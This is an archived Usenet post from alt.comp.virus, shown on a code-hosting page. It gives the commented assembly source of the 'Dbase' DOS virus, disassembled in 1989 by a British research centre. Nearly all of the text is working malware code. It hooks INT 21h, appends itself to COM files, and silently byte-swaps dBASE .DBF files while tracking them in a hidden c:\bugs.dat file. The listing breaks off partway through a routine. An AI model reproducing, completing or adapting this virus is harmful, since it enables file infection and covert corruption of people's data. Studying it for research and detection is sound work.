-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathDBASE.ASM
1063 lines (963 loc) · 22.9 KB
/
DBASE.ASM
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
From smtp Tue Feb 7 13:23 EST 1995
Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue, 7 Feb 95 13:23 EST
Received: by lynx.dac.neu.edu (8.6.9/8.6.9)
id NAA26032 for [email protected]; Tue, 7 Feb 1995 13:17:58 -0500
Date: Tue, 7 Feb 1995 13:17:58 -0500
From: lynx.dac.neu.edu!ekilby (Eric Kilby)
Content-Length: 22976
Content-Type: binary
Message-Id: <[email protected]>
To: pobox.jwu.edu!joshuaw
Subject: (fwd) DBase
Newsgroups: alt.comp.virus
Status: O
Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!solaris.cc.vt.edu!uunet!ankh.iia.org!danishm
From: [email protected] ()
Newsgroups: alt.comp.virus
Subject: DBase
Date: 5 Feb 1995 21:56:43 GMT
Organization: International Internet Association.
Lines: 1031
Message-ID: <[email protected]>
NNTP-Posting-Host: iia.org
X-Newsreader: TIN [version 1.2 PL2]
Here is the DBase virus:
page 65,132
title The 'Dbase' Virus
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The 'Dbase' Virus º
; º Disassembled by Joe Hirst, October 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
MCB SEGMENT AT 0
IDENT DB ?
OWNER DW ?
MEMSIZE DW ?
MCB ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING
; Interrupt 21H routine
BP0000: PUSHF
CMP AX,0FB0AH ; Infection test function?
JNE BP0010 ; Branch if not
XCHG AH,AL ; Swap bytes
POPF
IRET
; Branch to open file function
BP000A: JMP BP06DB
; Branch to new file functions
BP000D: JMP BP0391
BP0010: CMP DI,0FB0AH ; Allow free passage?
JE BP0044 ; Branch if yes
CMP AX,4B00H ; Load and execute function?
JNE BP001E ; Branch if not
JMP BP0490
BP001E: CMP AH,6CH ; Extended open/create function?
JE BP000D ; Branch if yes
CMP AH,5BH ; Create new file function?
JE BP000D ; Branch if yes
CMP AH,3CH ; Create handle function?
JE BP000D ; Branch if yes
CMP AH,3DH ; Open handle function?
JE BP000A ; Branch if yes
CMP AH,3FH ; Read handle function?
JE BP004A ; Branch if yes
CMP AH,40H ; Write handle function?
JE BP004D ; Branch if yes
CMP AH,3EH ; Close handle function?
JNE BP0044 ; Branch if not
JMP BP0340
; Pass on to Int 21H
BP0044: POPF
DB 0EAH ; Far jump
DW0046 DW 0 ; Int 21H offset
DW0048 DW 0 ; Int 21H segment
; Branch to read file function
BP004A: JMP BP00C8
; Branch to write file function
BP004D: JMP BP015F
JMP BP04A7
DB0053 DB 'c:\bugs.dat', 0 ; File pathname
DB 4EH DUP (0), 0FFH ; Read buffer
DW00AE DW 0
DB00B0 DB 14H DUP (0) ; Table of file handles
DW00C4 DW 0, 0
; Read file function
BP00C8: PUSH DI
CALL BP00CC ; \ Get current address
BP00CC: POP DI ; /
SUB DI,1CH ; Address table of file handles
BP00D0: CMP BYTE PTR CS:[DI],0 ; End of table?
JE BP00DE ; Branch if yes
CMP CS:[DI],BL ; Is this the file handle
JE BP00E2 ; Branch if yes
INC DI ; Next entry
JMP BP00D0
BP00DE: POP DI
JMP BP0044 ; Pass on to Int 21H
BP00E2: POP DI
POPF
PUSH CX
PUSH AX
PUSH DX
MOV AX,4201H ; Move file pointer (current) function
XOR CX,CX ; \ No offset
XOR DX,DX ; /
INT 21H ; DOS service
TEST AX,1 ; Is location odd number byte?
JZ BP012A ; Branch if not
MOV AX,4201H ; Move file pointer (current) function
MOV CX,-1 ; \ Back one byte
MOV DX,CX ; /
INT 21H ; DOS service
MOV AH,3FH ; Read handle function
MOV CX,1 ; Length to read
POP DX
CALL BP05C3 ; DOS service
POP AX
POP CX
PUSH SI
PUSH BP
MOV SI,DX
MOV BP,[SI]
CALL BP05C3 ; DOS service
PUSHF
PUSH AX
MOV AX,BP
MOV [SI],AL
POP AX
POP BP
POP SI
PUSH CX
PUSH DX
MOV CX,AX
DEC CX
INC DX
CALL BP022D ; Reverse bytes in each word
POP DX
POP CX
JMP BP0138
BP012A: POP DX
POP AX
POP CX
CALL BP05C3 ; DOS service
PUSHF
PUSH CX
MOV CX,AX
CALL BP022D ; Reverse bytes in each word
POP CX
BP0138: PUSH CX
PUSH AX
PUSH DX
MOV AX,4201H ; Move file pointer (current) function
XOR CX,CX ; \ No offset
XOR DX,DX ; /
INT 21H ; DOS service
TEST AX,1 ; Is location odd number byte?
JZ BP0158 ; Branch if not
POP DX
POP AX
PUSH AX
PUSH DX
ADD DX,AX
DEC DX
MOV CX,1 ; Length to read
MOV AH,3FH ; Read handle function
CALL BP05C3 ; DOS service
BP0158: POP DX
POP AX
POP CX
POPF
RETF 2
; Write file function
BP015F: PUSH DI
CALL BP0163 ; \ Get current address
BP0163: POP DI ; /
SUB DI,OFFSET BP0163-DB00B0 ; Address table of file handles
BP0168: CMP BYTE PTR CS:[DI],0 ; End of table?
JE BP0176 ; Branch if yes
CMP CS:[DI],BL ; Is this the file handle
JE BP017A ; Branch if yes
INC DI ; Next entry
JMP BP0168
BP0176: POP DI
JMP BP0044 ; Pass on to Int 21H
BP017A: CALL BP017D ; \ Get current address
BP017D: POP DI ; /
SUB DI,OFFSET BP017D-DW00C4
MOV WORD PTR CS:[DI],0
MOV WORD PTR CS:[DI+2],0
PUSH AX
PUSH BX
PUSH CX
PUSH DX
MOV AX,4201H ; Move file pointer (current) function
XOR CX,CX ; \ No offset
XOR DX,DX ; /
MOV DI,0FB0AH ; Allow free passage to DOS
INT 21H ; DOS service
TEST AX,1 ; Is location odd number byte?
JNZ BP01C0 ; Branch if yes
POP DX
POP CX
TEST AX,1 ; Is location odd number byte?
JNZ BP01B2 ; Branch if yes (???)
MOV AX,0
CALL BP0200
JMP BP01E9
BP01B2: MOV AX,1
CALL BP0200
JB BP01E9
CALL BP02B9
JMP BP01E9
BP01C0: POP DX
POP CX
TEST CX,1
JZ BP01D6
CALL BP0262
JB BP01E9
MOV AX,0100H
CALL BP0200
JMP BP01E9
BP01D6: CALL BP0262
JB BP01E9
MOV AX,0101H
CALL BP0200
JB BP01E9
CALL BP02B9
JMP BP01E9
BP01E9: POP BX
POP AX
POP DI
CALL BP01EF ; \ Get current address
BP01EF: POP SI ; /
SUB SI,OFFSET BP01EF-DW00C4
PUSH CS:[SI+2]
POPF
MOV AX,CS:[SI]
POP SI
RETF 2
BP0200: CMP CX,1
JNE BP0209
CALL BP0242
RET
BP0209: CALL BP0215
CALL BP0242
PUSHF
CALL BP0215
POPF
RET
BP0215: PUSH CX
PUSH DX
CALL BP0220
CALL BP022D ; Reverse bytes in each word
POP DX
POP CX
RET
BP0220: CMP AH,1
JNE BP0227
INC DX
DEC CX
BP0227: CMP AL,1
JNE BP022C
DEC CX
BP022C: RET
; Reverse bytes in each word
BP022D: PUSH SI
PUSH CX
PUSH AX
MOV SI,DX
SHR CX,1 ; Divide count by two
BP0234: MOV AX,[SI] ; Get next word
XCHG AH,AL ; Reverse bytes in word
MOV [SI],AX ; Replace word
INC SI ; \ Next word
INC SI ; /
LOOP BP0234 ; Repeat for count
POP AX
POP CX
POP SI
RET
BP0242: PUSH AX
PUSH CX
PUSH DX
PUSH DI
CALL BP0220
MOV AH,40H ; Write handle function
INT 21H ; DOS service
PUSHF
CALL BP0251 ; \ Get current address
BP0251: POP DI ; /
SUB DI,OFFSET BP0251-DW00C4
POP CS:[DI+2]
ADD CS:[DI],AX
POP DI
POP DX
POP CX
POP AX
RET
BP0262: PUSH AX
PUSH CX
PUSH DX
PUSH SI
PUSH BP
MOV DX,-1 ; \ Back one byte
MOV CX,DX ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
MOV AH,3FH ; Read handle function
MOV CX,1 ; Length to read
MOV SI,DX
MOV BP,[SI]
INT 21H ; DOS service
JB BP02A3 ; Branch if error
MOV DX,-1 ; \ Back one byte
MOV CX,DX ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
XCHG BP,[SI]
MOV CX,1 ; Length to write
MOV AH,40H ; Write handle function
INT 21H ; DOS service
JB BP02A3 ; Branch if error
XCHG BP,[SI]
MOV CX,1 ; Length to write
MOV AH,40H ; Write handle function
INT 21H ; DOS service
JB BP02A3 ; Branch if error
XCHG BP,[SI]
MOV AX,1
BP02A3: PUSHF
CALL BP02A7 ; \ Get current address
BP02A7: POP SI ; /
SUB SI,OFFSET BP02A7-DW00C4
POP CS:[SI+2]
MOV CS:[SI],AX
POP BP
POP SI
POP DX
POP CX
POP AX
RET
BP02B9: PUSH AX
PUSH CX
PUSH DX
PUSH SI
PUSH BP
MOV SI,DX
ADD SI,CX
DEC SI
MOV DX,1 ; \ Forward one byte
XOR CX,CX ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
MOV AH,3FH ; Read handle function
MOV CX,1 ; Read one byte
MOV BP,[SI]
INT 21H ; DOS service
JB BP02E0 ; Branch if error
CMP AX,1 ; One byte read?
JNE BP02E0 ; Branch if not
JMP BP02F6
BP02E0: MOV CX,-1 ; \ Back one byte
MOV DX,CX ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
MOV DX,SI
MOV CX,1 ; Length to write
MOV AH,40H ; Write handle function
INT 21H ; DOS service
JMP BP032A
BP02F6: MOV DX,-2 ; \ Back two byte
MOV CX,-1 ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
XCHG BP,[SI]
MOV CX,1 ; Length to write
MOV AH,40H ; Write handle function
MOV DX,SI
INT 21H ; DOS service
JB BP032A ; Branch if error
XCHG BP,[SI]
MOV CX,1 ; Length to write
MOV AH,40H ; Write handle function
MOV DX,SI
INT 21H ; DOS service
JB BP032A ; Branch if error
XCHG BP,[SI]
MOV DX,-1 ; \ Back one byte
MOV CX,DX ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
MOV AX,1
BP032A: PUSHF
CALL BP032E ; \ Get current address
BP032E: POP SI ; /
SUB SI,OFFSET BP032E-DW00C4
POP CS:[SI+2]
ADD CS:[SI],AX
POP BP
POP SI
POP DX
POP CX
POP AX
RET
BP0340: PUSH BP
PUSH CX
CALL BP0345 ; \ Get current address
BP0345: POP BP ; /
SUB BP,OFFSET BP0345-DW00AE
MOV CX,CS:[BP+0]
CMP CX,0
JE BP037C
ADD BP,2
BP0356: CMP CS:[BP+0],BL
JE BP0362
INC BP
LOOP BP0356
JMP BP037C
BP0362: MOV CL,CS:[BP+1]
MOV CS:[BP+0],CL
INC BP
CMP CL,0
JNE BP0362
CALL BP0373 ; \ Get current address
BP0373: POP BP ; /
SUB BP,OFFSET BP0373-DW00AE
DEC WORD PTR CS:[BP+0]
BP037C: POP CX
POP BP
JMP BP0044 ; Pass on to Int 21H
BP0381: JMP BP04A7
JMP BP0044 ; Pass on to Int 21H
DW0387 DW 0 ; File date
DW0389 DW 0 ; File time
DW038B DW 0 ; File attributes
DW038D DW 0 ; Pathname segment
DW038F DW 0 ; Pathname offset
; New file functions
BP0391: PUSH SI
PUSH BP
CMP AH,6CH ; Extended open/create function?
JE BP039A ; Branch if yes
MOV SI,DX ; Copy filepath pointer
BP039A: MOV BP,SI ; Copy filepath pointer
CALL BP0453 ; Convert pathname to uppercase
CALL BP0468 ; Test for Dbase file
JNE BP0381 ; Branch if not
PUSH DX
MOV DX,SI ; Copy pathname (for function 6CH)
CALL BP0665 ; Search BUG.DAT file for pathname
POP DX
JB BP0415 ; Branch if found
PUSH ES
PUSH DS
PUSH DX
PUSH SI
PUSH DI
PUSH CX
PUSH BX
PUSH AX
CALL BP03B8 ; \ Get current address
BP03B8: POP DX ; /
SUB DX,OFFSET BP03B8-DB0053 ; Address 'BUGS.DAT' pathname
PUSH BP
MOV BP,DS ; \ Set ES to DS
MOV ES,BP ; /
POP BP
PUSH CS ; \ Set DS to CS
POP DS ; /
MOV AX,3D02H ; Open handle (R/W) function
MOV DI,0FB0AH ; Allow free passage to DOS
INT 21H ; DOS service
JNB BP03D8 ; Branch if no error
MOV AH,3CH ; Create handle function
MOV CX,2 ; Hidden file
INT 21H ; DOS service
JB BP0448 ; Branch if error
BP03D8: MOV BX,AX ; Move handle
CALL BP06F7 ; Is file out of time?
XOR DX,DX ; \ No offset
XOR CX,CX ; /
MOV AX,4202H ; Move file pointer (EOF) function
INT 21H ; DOS service
MOV DX,BP
MOV DI,DX
MOV BP,ES ; \ Set DS to ES
MOV DS,BP ; /
MOV CX,004EH ; Length to write
MOV AH,40H ; Write handle function
MOV DI,0FB0AH ; Allow free passage to DOS
INT 21H ; DOS service
CALL BP03FB ; \ Get current address
BP03FB: POP SI ; /
SUB SI,74H ; Address file date
MOV DX,CS:[SI] ; Get file date
MOV AX,5701H ; Set file date & time function
INT 21H ; DOS service
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
JB BP0448 ; Branch if error
POP AX
POP BX
POP CX
POP DI
POP SI
POP DX
POP DS
POP ES
BP0415: POP BP
POP SI
POPF
CALL BP05C3 ; DOS service
JB BP0420 ; Branch if error
CALL BP0423
BP0420: RETF 2
BP0423: PUSHF
PUSH SI
CALL BP0428 ; \ Get current address
BP0428: POP SI ; /
SUB SI,OFFSET BP0428-DW00AE
CMP WORD PTR CS:[SI],14H
JE BP0447
INC WORD PTR CS:[SI]
PUSH BX
MOV BX,SI
ADD BX,CS:[SI]
ADD BX,CS:[SI]
MOV SI,BX
POP BX
MOV CS:[SI],AL
POP SI
POPF
BP0447: RET
BP0448: POP AX
POP BX
POP CX
POP DI
POP SI
POP DX
POP DS
POP ES
JMP BP04A7
; Convert pathname to uppercase
BP0453: PUSH SI
MOV SI,DX ; Copy pathname pointer
BP0456: CMP BYTE PTR [SI],0 ; End of pathname?
JE BP0466 ; Branch if yes
CMP BYTE PTR [SI],'a' ; Lowercase character?
JB BP0463 ; Branch if not
SUB BYTE PTR [SI],' ' ; Convert to uppercase
BP0463: INC SI ; Next character
JMP BP0456 ; Process next character
BP0466: POP SI
RET
; Test for Dbase file
BP0468: CALL BP0453 ; Convert pathname to uppercase
PUSH SI
BP046C: CMP BYTE PTR [SI],0 ; End of pathname?
JE BP0480 ; Branch if yes
CMP BYTE PTR [SI],'.' ; Extension character?
JE BP0479 ; Branch if yes
INC SI ; Next character
JMP BP046C ; Process next character
BP0479: INC SI ; Next character
CMP WORD PTR [SI],'BD' ; Database file (1)?
JNE BP0484 ; Branch if not
BP0480: CMP BYTE PTR [SI+2],'F' ; Database file (2)?
BP0484: POP SI
RET
DB0486 DB 0CDH, 20H, 90H, 90H ; Start of host read buffer
DB048A DB 0, 0 ; Signature read buffer
DB048C DB 0E9H, 0, 0 ; Initial jump instruction
DB 0
; Load and execute function
BP0490: PUSH BP
PUSH SI
MOV SI,DX ; Copy pathname pointer
BP0494: CMP BYTE PTR [SI],0 ; End of pathname?
JE BP04A7 ; Branch if yes
CMP BYTE PTR [SI],'.' ; Extension indicator?
JE BP04AC ; Branch if yes
INC SI ; Next character
JMP BP0494 ; Process next character
BP04A1: POP DS
POP DX
POP DI
POP CX
POP BX
POP AX
BP04A7: POP BP
POP SI
JMP BP0044 ; Pass on to Int 21H
BP04AC: INC SI ; Next character
CMP WORD PTR [SI],'OC' ; Is it a COM file? (1)
JNE BP04A7 ; Branch if not
CMP BYTE PTR [SI+2],'M' ; Is it a COM file? (1)
JNE BP04A7 ; Branch if not
PUSH AX
PUSH BX
PUSH CX
PUSH DI
PUSH DX
PUSH DS
PUSH SI
PUSH CX
MOV AX,4300H ; Get file attributes function
INT 21H ; DOS service
CALL BP04C9 ; \ Get current address
BP04C9: POP SI ; /
SUB SI,OFFSET BP04C9-DW038B ; Address file attributes
MOV CS:[SI],CX ; Save file attributes
MOV CS:[SI+2],DS ; Save pathname segment
MOV CS:[SI+4],DX ; Save pathname offset
AND CX,00FEH ; Switch off read only
MOV AX,4301H ; Set file attributes function
INT 21H ; DOS service
POP CX
POP SI
MOV AX,3D00H ; Open handle (read) function
INT 21H ; DOS service
JB BP04A1 ; Branch if error
MOV BX,AX ; Move handle
MOV AX,5700H ; Get file date & time function
INT 21H ; DOS service
PUSH SI
CALL BP04F6 ; \ Get current address
BP04F6: POP SI ; /
SUB SI,OFFSET BP04F6-DW0387 ; Address file date
MOV CS:[SI],DX ; Save file date
MOV CS:[SI+2],CX ; Save file time
POP SI
MOV AH,3FH ; Read handle function
MOV CX,4 ; Length to read
CALL BP050B ; \ Get current address
BP050B: POP SI ; /
SUB SI,OFFSET BP050B ; Offset of start of virus
MOV DX,SI ; \ Address start of host read buffer
ADD DX,OFFSET DB0486 ; /
PUSH CS ; \ Set DS to CS
POP DS ; /
INT 21H ; DOS service
JB BP058A ; Branch if error
PUSH DX
PUSH SI
MOV SI,DX ; Address start of host read buffer
MOV DX,[SI+1] ; Get branch offset (if its a branch?)
INC DX ; \ Address to signature (DB0630)
XOR CX,CX ; /
MOV AX,4200H ; Move file pointer (start) function
INT 21H ; DOS service
POP SI
POP DX
JB BP058A ; Branch if error
MOV AH,3FH ; Read handle function
MOV CX,2 ; Length to read
ADD DX,4 ; Address to signature read buffer
INT 21H ; DOS service
PUSH SI
MOV SI,DX ; \ Copy signature read buffer address
MOV DI,SI ; /
CMP WORD PTR [SI],0E5E5H ; Test signature
POP SI
JE BP058A ; Branch if infected
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
POP DS
POP DX
PUSH DX
PUSH DS
MOV AX,3D02H ; Open handle (R/W) function
INT 21H ; DOS service
JNB BP0557 ; Branch if no error
JMP BP04A1
BP0557: PUSH CS ; \ Set DS to CS
POP DS ; /
MOV BX,AX ; Move handle
MOV AX,4202H ; Move file pointer (EOF) function
XOR CX,CX ; \ No offset
XOR DX,DX ; /
INT 21H ; DOS service
ADD AX,OFFSET START-3 ; Add entry point offset
NOP
MOV [DI+3],AX ; Store in initial jump instruction
XOR DX,DX ; Address start of virus
MOV AH,40H ; Write handle function
MOV CX,OFFSET ENDADR ; Length of virus
NOP
INT 21H ; DOS service
MOV AX,4200H ; Move file pointer (start) function
XOR CX,CX ; \ No offset
XOR DX,DX ; /
INT 21H ; DOS service
MOV DX,DI ; \ Address initial jump instruction
ADD DX,2 ; /
MOV CX,3 ; Length of jump instruction
MOV AH,40H ; Write handle function
INT 21H ; DOS service
BP058A: PUSH SI
CALL BP058E ; \ Get current address
BP058E: POP SI ; /
SUB SI,OFFSET BP058E-DW0387 ; Address file date
MOV DX,CS:[SI] ; Get file date
MOV CX,CS:[SI+2] ; Get file time
POP SI
MOV AX,5701H ; Set file date & time function
INT 21H ; DOS service
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
PUSH SI
PUSH CX
CALL BP05A9 ; \ Get current address
BP05A9: POP SI ; /
SUB SI,OFFSET BP05A9-DW038B ; Address file attributes
MOV CX,CS:[SI] ; Get file attributes
MOV DS,CS:[SI+2] ; Get pathname offset
MOV DX,CS:[SI+4] ; Get pathname segment
MOV AX,4301H ; Set file attributes function
INT 21H ; DOS service
POP CX
POP SI
JMP BP04A1
; Call DOS service
BP05C3: PUSHF
DB 9AH ; Far call
DW05C5 DW 0 ; Int 21H offset
DW05C7 DW 0 ; Int 21H segment
RET
; Infect system
BP05CA: PUSH SI
CALL BP05CE ; \ Get current address
BP05CE: POP SI ; /
SUB SI,OFFSET BP05CE ; Relocate from start of virus
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH DI
PUSH DS
PUSH ES
MOV AX,3521H ; Get Int 21H function
INT 21H ; DOS service
MOV CS:[SI+46H],BX ; \ Install vector in jump
MOV CS:[SI+48H],ES ; /
MOV CS:DW05C5[SI],BX ; \ Install vector in call
MOV CS:DW05C7[SI],ES ; /
PUSH CS ; \ Get current segment
POP AX ; /
DEC AX ; \ Address MCB
MOV DS,AX ; /
ASSUME DS:MCB
MOV DX,MEMSIZE ; Get memory block length
SUB DX,0074H ; \ Subtract virus length
nop
DEC DX ; /
MOV MEMSIZE,DX ; Replace new length
ASSUME DS:NOTHING
PUSH CS ; \ Get current segment
POP AX ; /
ADD DX,AX ; \ Address free space
MOV DS,DX ; /
MOV DI,0 ; Start of free space
MOV CX,OFFSET ENDADR ; Length of virus
NOP
CLI
PUSH SI
BP0612: MOV AL,CS:[SI]
MOV [DI],AL
INC SI
INC DI
LOOP BP0612
POP SI
MOV DS,DX
MOV DX,OFFSET BP0000
MOV AX,2521H ; Set Int 21H function
INT 21H ; DOS service
STI
POP ES
POP DS
POP DI
POP DX
POP CX
POP BX
POP AX
JMP BP0640
DB0630 DB 0E5H, 0E5H
; Entry point
START: PUSH AX
MOV AX,0FB0AH ; Infection test function
INT 21H ; DOS service
CMP AX,0AFBH ; Is system infected?
JE BP0640 ; Branch if yes
JMP BP05CA
BP0640: PUSH SI
CALL BP0644 ; \ Get current address
BP0644: POP SI ; /
SUB SI,OFFSET BP0644-DB0486 ; Address start of host read buffer
PUSH BX
MOV BX,0100H ; Address start of host
MOV AX,CS:[SI] ; \ Restore start of host (1)
MOV CS:[BX],AX ; /
MOV AX,CS:[SI+2] ; \
ADD BX,2 ; ) Restore start of host (2)
MOV CS:[BX],AX ; /
POP BX
POP SI
POP AX
MOV AX,0100H ; \ Branch to start of host
JMP AX ; /
; Search BUG.DAT file for pathname
BP0665: PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH BP
PUSH DS
PUSH ES
CALL BP0671 ; \ Get current address
BP0671: POP BP ; /
SUB BP,OFFSET BP0671-DB0053 ; Address 'BUGS.DAT' pathname
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV DI,DX ; Copy pathname pointer
PUSH CS ; \ Set DS to CS
POP DS ; /
MOV DX,BP ; Move pathname address
MOV AX,3D00H ; Open handle (read) function
PUSH DI
MOV DI,0FB0AH ; Allow free passage to DOS
INT 21H ; DOS service
JNB BP0697 ; Branch if no error
MOV AH,3CH ; Create handle function
MOV CX,2 ; Hidden file
INT 21H ; DOS service
JNB BP0697 ; Branch if no error
BP0692: POP DI
CLC
JMP BP06D1
BP0697: MOV BX,AX ; Move handle
ADD DX,0CH ; Read buffer
BP069C: MOV CX,004EH ; Length to read
MOV AH,3FH ; Read handle function
INT 21H ; DOS service
JB BP0692 ; Branch if error
CMP AX,0 ; Did we read anything?
JNE BP06B0 ; Branch if yes
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
JMP BP0692
BP06B0: POP DI
MOV SI,DX
PUSH DI
BP06B4: MOV AL,ES:[DI] ; Get next character
CMP AL,0 ; End of pathname?
JE BP06C3 ; Branch if yes
CMP AL,[SI] ; Does it match file?
JNE BP069C ; Read next section if not
INC SI ; Next file character
INC DI ; Next pathname character
JMP BP06B4 ; Compare next character
; Pathname found on BUG.DAT file
BP06C3: POP DI
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
STC
JMP BP06D1
; unreferenced code
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
CLC
BP06D1: POP ES
POP DS
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RET
; Open file function
BP06DB: POPF
CALL BP05C3 ; DOS service
JB BP06F4 ; Branch if error
PUSHF
PUSH SI
MOV SI,DX
CALL BP0468 ; Test for Dbase file
JNE BP06F2 ; Branch if not
CALL BP0665 ; Search BUG.DAT file for pathname
JNB BP06F2 ; Branch if not found
CALL BP0423
BP06F2: POP SI
POPF
BP06F4: RETF 2
; Is file out of time?
BP06F7: PUSH AX
PUSH CX
PUSH DX
PUSH SI
MOV AX,5700H ; Get file date & time function